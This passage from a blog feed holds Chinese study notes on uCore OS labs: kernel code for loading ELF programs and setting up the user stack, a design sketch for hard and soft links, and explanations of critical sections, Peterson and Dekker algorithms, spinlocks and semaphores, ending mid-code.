class="built_in">ROUNDDOWN</span>(start, PGSIZE);</span><br><span class="line"></span><br><span class="line">        ret = -E_NO_MEM;</span><br><span class="line"></span><br><span class="line">        end = ph-&gt;p_va + ph-&gt;p_filesz;</span><br><span class="line">        <span class="keyword">while</span> (start &lt; end) &#123;</span><br><span class="line">            <span class="comment">// 设置该内存所对应的页表项</span></span><br><span class="line">            <span class="keyword">if</span> ((page = <span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, la, perm)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">                ret = -E_NO_MEM;</span><br><span class="line">                <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">            &#125;</span><br><span class="line">            off = start - la, size = PGSIZE - off, la += PGSIZE;</span><br><span class="line">            <span class="keyword">if</span> (end &lt; la) &#123;</span><br><span class="line">                size -= la - end;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// LAB8 读取elf对应段内的数据并写入至该内存中</span></span><br><span class="line">            <span class="keyword">if</span> ((ret = <span class="built_in">load_icode_read</span>(fd, <span class="built_in">page2kva</span>(page) + off, size, offset)) != <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">            &#125;</span><br><span class="line">            start += size, offset += size;</span><br><span class="line">        &#125;</span><br><span class="line">        end = ph-&gt;p_va + ph-&gt;p_memsz;</span><br><span class="line">        <span class="comment">// 对于段中当前页中剩余的空间（复制elf数据后剩下的空间），将其置为0</span></span><br><span class="line">        <span class="keyword">if</span> (start &lt; la) &#123;</span><br><span class="line">            <span class="comment">/* ph-&gt;p_memsz == ph-&gt;p_filesz */</span></span><br><span class="line">            <span class="keyword">if</span> (start == end) &#123;</span><br><span class="line">                <span class="keyword">continue</span> ;</span><br><span class="line">            &#125;</span><br><span class="line">            off = start + PGSIZE - la, size = PGSIZE - off;</span><br><span class="line">            <span class="keyword">if</span> (end &lt; la) &#123;</span><br><span class="line">                size -= la - end;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">memset</span>(<span class="built_in">page2kva</span>(page) + off, <span class="number">0</span>, size);</span><br><span class="line">            start += size;</span><br><span class="line">            <span class="built_in">assert</span>((end &lt; la &amp;&amp; start == end) || (end &gt;= la &amp;&amp; start == la));</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 对于段中剩余页中的空间（复制elf数据后的多余页面），将其置为0</span></span><br><span class="line">        <span class="keyword">while</span> (start &lt; end) &#123;</span><br><span class="line">            <span class="keyword">if</span> ((page = <span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, la, perm)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">                ret = -E_NO_MEM;</span><br><span class="line">                <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">            &#125;</span><br><span class="line">            off = start - la, size = PGSIZE - off, la += PGSIZE;</span><br><span class="line">            <span class="keyword">if</span> (end &lt; la) &#123;</span><br><span class="line">                size -= la - end;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="built_in">memset</span>(<span class="built_in">page2kva</span>(page) + off, <span class="number">0</span>, size);</span><br><span class="line">            start += size;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 关闭读取的ELF</span></span><br><span class="line">    <span class="built_in">sysfile_close</span>(fd);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 设置栈内存</span></span><br><span class="line">    vm_flags = VM_READ | VM_WRITE | VM_STACK;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">mm_map</span>(mm, USTACKTOP - USTACKSIZE, USTACKSIZE, vm_flags, <span class="literal">NULL</span>)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">goto</span> bad_cleanup_mmap;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, USTACKTOP-PGSIZE , PTE_USER) != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, USTACKTOP<span class="number">-2</span>*PGSIZE , PTE_USER) != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, USTACKTOP<span class="number">-3</span>*PGSIZE , PTE_USER) != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">pgdir_alloc_page</span>(mm-&gt;pgdir, USTACKTOP<span class="number">-4</span>*PGSIZE , PTE_USER) != <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">mm_count_inc</span>(mm);</span><br><span class="line">    <span class="comment">// 设置CR3页表相关寄存器</span></span><br><span class="line">    current-&gt;mm = mm;</span><br><span class="line">    current-&gt;cr3 = <span class="built_in">PADDR</span>(mm-&gt;pgdir);</span><br><span class="line">    <span class="built_in">lcr3</span>(<span class="built_in">PADDR</span>(mm-&gt;pgdir));</span><br><span class="line"></span><br><span class="line">    <span class="comment">//setup argc, argv</span></span><br><span class="line">    <span class="comment">// LAB8 设置execve所启动的程序参数</span></span><br><span class="line">    <span class="type">uint32_t</span> argv_size=<span class="number">0</span>, i;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; argc; i ++) &#123;</span><br><span class="line">        argv_size += <span class="built_in">strnlen</span>(kargv[i],EXEC_MAX_ARG_LEN + <span class="number">1</span>)<span class="number">+1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="type">uintptr_t</span> stacktop = USTACKTOP - (argv_size/<span class="built_in">sizeof</span>(<span class="type">long</span>)<span class="number">+1</span>)*<span class="built_in">sizeof</span>(<span class="type">long</span>);</span><br><span class="line">    <span class="comment">// 直接将传入的参数压入至新栈的底部</span></span><br><span class="line">    <span class="type">char</span>** uargv=(<span class="type">char</span> **)(stacktop  - argc * <span class="built_in">sizeof</span>(<span class="type">char</span> *));</span><br><span class="line"></span><br><span class="line">    argv_size = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (i = <span class="number">0</span>; i &lt; argc; i ++) &#123;</span><br><span class="line">        uargv[i] = <span class="built_in">strcpy</span>((<span class="type">char</span> *)(stacktop + argv_size ), kargv[i]);</span><br><span class="line">        argv_size +=  <span class="built_in">strnlen</span>(kargv[i],EXEC_MAX_ARG_LEN + <span class="number">1</span>)<span class="number">+1</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    stacktop = (<span class="type">uintptr_t</span>)uargv - <span class="built_in">sizeof</span>(<span class="type">int</span>);</span><br><span class="line">    *(<span class="type">int</span> *)stacktop = argc;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">trapframe</span> *tf = current-&gt;tf;</span><br><span class="line">    <span class="built_in">memset</span>(tf, <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe));</span><br><span class="line">    tf-&gt;tf_cs = USER_CS;</span><br><span class="line">    tf-&gt;tf_ds = tf-&gt;tf_es = tf-&gt;tf_ss = USER_DS;</span><br><span class="line">    tf-&gt;tf_esp = stacktop;</span><br><span class="line">    tf-&gt;tf_eip = elf-&gt;e_entry;</span><br><span class="line">    tf-&gt;tf_eflags = FL_IF;</span><br><span class="line">    ret = <span class="number">0</span>;</span><br><span class="line">out:</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">bad_cleanup_mmap:</span><br><span class="line">    <span class="built_in">exit_mmap</span>(mm);</span><br><span class="line">bad_elf_cleanup_pgdir:</span><br><span class="line">    <span class="built_in">put_pgdir</span>(mm);</span><br><span class="line">bad_pgdir_cleanup_mm:</span><br><span class="line">    <span class="built_in">mm_destroy</span>(mm);</span><br><span class="line">bad_mm:</span><br><span class="line">    <span class="keyword">goto</span> out;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li></ul><blockquote><p>给出设计实现基于”<strong>UNIX的硬链接和软链接机制</strong>“的概要设方案</p></blockquote><ul><li><p>SFS中已经预留出硬链接/软链接的相关定义（没有实现）</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * VFS layer high-level operations on pathnames</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_link         - Create a hard link to a file.</span></span><br><span class="line"><span class="comment"> *    vfs_symlink      - Create a symlink PATH containing contents CONTENTS.</span></span><br><span class="line"><span class="comment"> *    vfs_unlink       - Delete a file/directory.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_link</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_symlink</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_unlink</span><span class="params">(<span class="type">char</span> *path)</span></span>;</span><br></pre></td></tr></table></figure></li><li><p>硬链接机制的实现</p><ul><li>创建硬链接时，仍然为<code>new_path</code>建立一个<code>sfs_disk_entry</code>结构，但该结构的内部<code>ino</code>成员指向<code>old_path</code>的磁盘索引结点，并使该磁盘索引节点的<code>nlinks</code>引用计数成员加一即可。</li><li>删除硬链接时，令对应磁盘结点<code>sfs_disk_inode</code>中的<code>nlinks</code>减一，同时删除硬链接的<code>sfs_disk_entry</code>结构即可。</li></ul></li><li><p>软链接的实现</p><ul><li><p>与创建硬链接不同，创建软链接时要多建立一个<code>sfs_disk_inode</code>结构（即建立一个全新的文件）。之后，将<code>old_path</code>写入该文件中，并标注<code>sfs_disk_inode</code>的<code>type</code>为<code>SFS_TYPE_LINK</code>即可。</p></li><li><p>删除软链接与删除文件的操作没有区别，直接将对应的<code>sfs_disk_entry</code>和<code>sfs_disk_inode</code>结构删除即可。</p></li></ul></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;简介&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;这里是笔者在完成&lt;code&gt;uCore&lt;/code&gt; Lab 8时写下的一些笔记&lt;/li&gt;
&lt;li&gt;内容涉及文件系统与I/O子系统的一些相关实现。&lt;/li&gt;
&lt;li&gt;内容巨多，建议使用右侧导航栏&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore实验 - Lab7</title>
    <link href="https://kiprey.github.io/2020/09/uCore-7/"/>
    <id>https://kiprey.github.io/2020/09/uCore-7/</id>
    <published>2020-09-21T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.153Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里是笔者在完成<code>uCore</code> Lab 7时写下的一些笔记</li><li>内容涉及信号、管程、死锁和进程通信的一些相关实现。</li></ul><span id="more"></span><h2 id="知识点">知识点</h2><h3 id="1-原子操作（Atomic-Operator）">1. 原子操作（Atomic Operator）</h3><ul><li><p>原子操作是指一次不存在任何中断或失效的操作</p></li><li><p>该操作只有两种情况</p><ul><li>操作<strong>成功执行</strong></li><li>操作<strong>没有执行</strong></li></ul><blockquote><p><strong>不存在</strong>出现<strong>部分执行</strong>的情况</p></blockquote><ul><li>操作系统需要利用同步机制在并发执行的同时，保存一些操作是原子操作。</li></ul></li></ul><h3 id="2-进程的交互关系">2. 进程的交互关系</h3><hr><table><thead><tr><th style="text-align:center">相互感知的程度</th><th style="text-align:center">交互关系</th><th style="text-align:center">进程间的影响</th></tr></thead><tbody><tr><td style="text-align:center">相互不感知（完全不了解其他进程的存在）</td><td style="text-align:center">独立</td><td style="text-align:center">一个进程的操作对其他进程的结果无影响</td></tr><tr><td style="text-align:center">间接感知（双方都与第三方交互，例如数据共享）</td><td style="text-align:center">通过共享进行协作</td><td style="text-align:center">一个进程的结果依赖于共享资源的状态</td></tr><tr><td style="text-align:center">直接感知（双方直接交互，例如通信）</td><td style="text-align:center">通过通信进行协作</td><td style="text-align:center">一个进程的结果依赖于从其他进程获得的信息</td></tr></tbody></table><p>进程之间可能出现三种关系：</p><ul><li>互斥（mutual exclusion）：一个进程占用资源，<strong>其他进程不能使用</strong></li><li>死锁（deadlock）：多个进程占用部分资源，形成<strong>循环等待</strong></li><li>饥饿（starvation）：其他进程可能轮流占用资源，一个进程<strong>一直得不到资源</strong></li></ul><h3 id="3-临界区">3. 临界区</h3><h4 id="a-相关区域的概念">a. 相关区域的概念</h4><ul><li>临界区（critical section）：进程中访问临界资源的一段需要互斥执行的代码。</li><li>进入区（entry section）：检查可否进入临界区的一段代码。如果可以进入，则设置“<strong>正在访问临界区</strong>”标志</li><li>退出区（exit section）: 清除标志</li><li>剩余区（remainder section）: 代码中的其余部分</li></ul><h4 id="b-临界区的访问规则">b. 临界区的访问规则</h4><p>空闲则入、忙则等待、有限等待、让权等待（可选）</p><blockquote><p>让权等待：让不能进入临界区的进程暂时释放CPU资源。</p></blockquote><h4 id="c-临界区的实现方法">c. 临界区的实现方法</h4><h5 id="1-禁用中断">1) 禁用中断</h5><ul><li><p>无中断，无上下文切换，因此无并发</p><ul><li><p>硬件将中断处理延迟到中断被启用之后</p></li><li><p>现代计算机体系结构都提供指令来实现禁用中断。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">local_irq_save</span>(<span class="type">unsigned</span> <span class="type">long</span> flags);</span><br><span class="line"><span class="function">critical_section</span></span><br><span class="line"><span class="function"><span class="title">local_irq_restore</span><span class="params">(<span class="type">unsigned</span> <span class="type">long</span> flags)</span></span>;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>进入临界区：禁止所有中断，并保存标志</p></li><li><p>离开临界区：使能所有中断，并恢复标志</p></li><li><p>缺点</p><ul><li><p>禁用中断后，<strong>进程无法被停止</strong></p><ul><li>整个系统都会因此停下</li><li>可能导致其他进程处于饥饿状态</li></ul></li><li><p>临界区可能很长，<strong>无法确定响应中断所需的时间</strong></p></li><li><p>仅限于<strong>单处理器</strong></p></li></ul></li></ul><h5 id="2-基于软件的同步解决方法">2) 基于软件的同步解决方法</h5><p><strong>线程可通过共享一些共有变量来同步它们的行为</strong>。</p><ul><li><p>Peterson算法（两线程之间的同步互斥算法）</p><ul><li><p>共享变量</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> turn; <span class="comment">// 表示该谁进入临界区</span></span><br><span class="line"><span class="type">bool</span> flag[]; <span class="comment">// 表示进程是否准备好进入临界区</span></span><br></pre></td></tr></table></figure></li><li><p>进入区代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 设置当前线程想进入临界区</span></span><br><span class="line">flag[i] = <span class="literal">true</span>;</span><br><span class="line"><span class="comment">// 先让另一个进程执行</span></span><br><span class="line">turn = j;</span><br><span class="line"><span class="comment">// 如果另一个进程想进入同时也可进入临界区，则当前进程等待</span></span><br><span class="line"><span class="keyword">while</span>(flag[j] &amp;&amp; turn == j)</span><br><span class="line">    ;</span><br></pre></td></tr></table></figure></li><li><p>退出区代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 设置当前线程不想进入临界区</span></span><br><span class="line">flag[i] = <span class="literal">false</span>;</span><br></pre></td></tr></table></figure></li><li><p>总结</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 线程Ti的代码</span></span><br><span class="line"><span class="keyword">do</span>&#123;</span><br><span class="line">    <span class="comment">// 设置当前线程想进入临界区</span></span><br><span class="line">    flag[i] = <span class="literal">true</span>;</span><br><span class="line">    <span class="comment">// 先让另一个进程执行</span></span><br><span class="line">    turn = j;</span><br><span class="line">    <span class="comment">// 如果另一个进程想进入同时也可进入临界区，则当前进程等待</span></span><br><span class="line">    <span class="keyword">while</span>(flag[j] &amp;&amp; turn == j)</span><br><span class="line">        ;<span class="comment">// 忙等待</span></span><br><span class="line"></span><br><span class="line">    CRITICAL SECTION</span><br><span class="line"></span><br><span class="line">    flag[i] = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">    REMAINDER SECTION</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">while</span>(<span class="literal">true</span>);</span><br></pre></td></tr></table></figure></li></ul></li><li><p>Dekkers算法。逻辑与Peterson类似，为另一种的两线程之间的同步互斥算法。所不同的是<strong>这个算法可以很方便的扩展至多个线程</strong>。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 线程Ti的代码</span></span><br><span class="line">flag[<span class="number">0</span>] = flag[<span class="number">1</span>] = <span class="literal">false</span>;</span><br><span class="line">turn = <span class="number">0</span>;</span><br><span class="line"><span class="keyword">do</span>&#123;</span><br><span class="line">    <span class="comment">// 设置当前进程想进入临界区</span></span><br><span class="line">    flag[i] = <span class="literal">true</span>;</span><br><span class="line">    <span class="comment">// 如果上一个进程想进入临界区，则先让它进</span></span><br><span class="line">    <span class="keyword">while</span>(flag[j] == <span class="literal">true</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 如果目前轮到的进程不是当前进程</span></span><br><span class="line">        <span class="keyword">if</span>(turn != i)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 则取消进入临界区的标记</span></span><br><span class="line">            flag[i] = <span class="literal">false</span>;</span><br><span class="line">            <span class="comment">// 并等待轮到当前进程</span></span><br><span class="line">            <span class="keyword">while</span>(turn != i)</span><br><span class="line">                ; <span class="comment">// 忙等待</span></span><br><span class="line">            <span class="comment">// 一旦轮到当前进程，则设置进入临界区的标记</span></span><br><span class="line">            flag[i] = <span class="literal">true</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    CRITICAL SECTION</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 当前进程临界区已经执行完成，轮换至下一个进程</span></span><br><span class="line">    turn = j;</span><br><span class="line">    flag[i] = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">    REMAINDER SECTION</span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">while</span>(<span class="literal">true</span>);</span><br></pre></td></tr></table></figure></li><li><p>N线程的软件方法（Eisenberg和McGuire）</p><p><img src="/2020/09/uCore-7/nthreads.png" alt="img"></p></li><li><p>缺点</p><ul><li>复杂：需要两个进程间的共享数据项</li><li>需要忙等待：浪费CPU时间</li></ul></li></ul><h5 id="3-更高级的抽象方法">3) 更高级的抽象方法</h5><ul><li><p>硬件提供一些同步原语：例如中断禁用，原子操作指令等</p></li><li><p>操作系统提供更高级的编程抽象来简化进程同步：例如锁、信号量，或者用硬件原语来构造、</p></li><li><p><strong>锁（lock)</strong></p><ul><li><p>锁是一个抽象的数据结构</p><ul><li>使用一个二进制变量，用于表示锁定/解锁</li><li><strong>Lock::Acquire()</strong> : 锁被释放前一直等待，直到得到锁</li><li><strong>Lock::Release()</strong> : 释放锁，唤醒任何等待的进程</li></ul></li><li><p>使用锁来控制临界区访问</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">lock_next_pid-&gt;<span class="built_in">Acquire</span>();</span><br><span class="line">next_pid = next_pid++;</span><br><span class="line">lock_next_pid-&gt;<span class="built_in">Release</span>();</span><br></pre></td></tr></table></figure></li></ul></li><li><p><strong>原子操作指令</strong></p><ul><li><p>现代CPU体系结构都提供一些特殊的原子操作指令</p></li><li><p>测试和置位（Test-and-Set）指令</p><blockquote><p>从内存中获取值，测试该值是否为1，并设置内存单元值为1</p></blockquote><p>等效于：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">TestAndSet</span><span class="params">(<span class="type">bool</span> *target)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">bool</span> ret = *target;</span><br><span class="line">    *target = <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>交换指令（exchange）</p><blockquote><p>交换内存中的两个值</p></blockquote><p>等效于：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">exchange</span><span class="params">(<span class="type">bool</span> *a, <span class="type">bool</span>* b)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">bool</span> tmp = *a;</span><br><span class="line">    *a = *b;</span><br><span class="line">    *b = tmp;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>使用TS指令实现自旋锁（spinlock)</p><ul><li><p>自旋忙等待锁</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Lock</span>&#123;</span><br><span class="line">    <span class="type">int</span> value = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Acquire</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// 如果锁被释放，则读取并设置value为1</span></span><br><span class="line">        <span class="comment">// 如果锁被占用，则一直循环查找</span></span><br><span class="line">        <span class="keyword">while</span>(test-<span class="keyword">and</span>-<span class="built_in">set</span>(value))</span><br><span class="line">            ; <span class="comment">// spin，线程在等待时需要消耗CPU资源</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Release</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        value = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>无忙等待锁（非自旋锁）</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Lock</span>&#123;</span><br><span class="line">    <span class="type">int</span> value = <span class="number">0</span>;</span><br><span class="line">    WaitQueue q;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Acquire</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// 如果锁被释放，则读取并设置value为1</span></span><br><span class="line">        <span class="comment">// 如果锁被占用，则一直循环查找</span></span><br><span class="line">        <span class="keyword">while</span>(test-<span class="keyword">and</span>-<span class="built_in">set</span>(value))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 当前进程无法获取到锁，进入等待队列</span></span><br><span class="line">            q.<span class="built_in">push_back</span>(currentThread-&gt;PCB);</span><br><span class="line">            <span class="comment">// 调度至其他线程中运行</span></span><br><span class="line">            <span class="built_in">schedule</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">Release</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        value = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// 唤醒等待队列中的线程</span></span><br><span class="line">        PCB&amp; t = q.<span class="built_in">pop_front</span>();</span><br><span class="line">        <span class="built_in">wakeup</span>(t);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>原子操作锁的特征</p><ul><li><p>优点</p><ul><li>适用于单处理器或者共享主存的多处理器中任意数量的进程同步</li><li>简单并容易证明</li><li>支持多临界区</li></ul></li><li><p>缺点</p><ul><li><p>忙等待消耗处理器时间</p></li><li><p>可能导致饥饿：进程离开临界区时有多个等待进程的情况</p></li><li><p><strong>死锁</strong>：拥有临界区的低优先级进程，以及请求访问临界区的高优先级进程获得处理器并等待临界区。</p></li></ul></li></ul></li></ul><h3 id="4-信号量">4. 信号量</h3><h4 id="a-相关概念">a. 相关概念</h4><ul><li><p>信号量(Semaphore)是操作系统提供的一种协调共享资源访问的方法</p><ul><li>软件同步是平等线程间的一种同步协商机制</li><li>OS是管理者，地位高于进程</li><li>用信号量表示系统资源的数量</li></ul></li><li><p>信号量是一种抽象数据类型</p><ul><li>由一个整数（sem）变量和两个原子操作组成</li><li><strong>P()</strong> ：<code>sem--</code>，如果sem&lt;0，则进入等待，否则继续</li><li><strong>V()</strong> : <code>sem++</code>, 如果sem &lt;= 0, 唤醒一个等待进程</li></ul></li><li><p>信号量是被保护的整数变量</p><ul><li>初始化完成后，只能通过 <strong>P()</strong> 和 <strong>V()</strong> 操作修改</li><li>由操作系统来保证，PV操作是<strong>原子操作</strong></li></ul></li><li><p>P() 可能阻塞，但 V() 不会阻塞</p></li><li><p>通常，假定信号量是“公平的”</p><ul><li><p>即，线程不会被无限期阻塞在P() 操作中</p></li><li><p>假定信号量等待按先进先出排队</p><blockquote><p>自旋锁不能实现先进先出</p></blockquote></li></ul></li><li><p>信号量的一种实现方式</p><blockquote><p>与用户自己编写的锁不同，<strong>操作系统保证PV操作是原子操作</strong>。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">class</span> <span class="title class_">Semaphore</span>&#123;</span><br><span class="line">    <span class="type">int</span> sem;</span><br><span class="line">    WaitQueue q;</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="type">void</span> <span class="title">P</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="comment">// 由于操作系统的保证，修改变量与条件判断之间不可能会出现条件竞争</span></span><br><span class="line">        sem--;</span><br><span class="line">        <span class="keyword">if</span>(sem &lt; <span class="number">0</span>)&#123;</span><br><span class="line">            Add <span class="keyword">this</span> thread t to q;</span><br><span class="line">            <span class="built_in">block</span>(p);</span><br><span class="line">        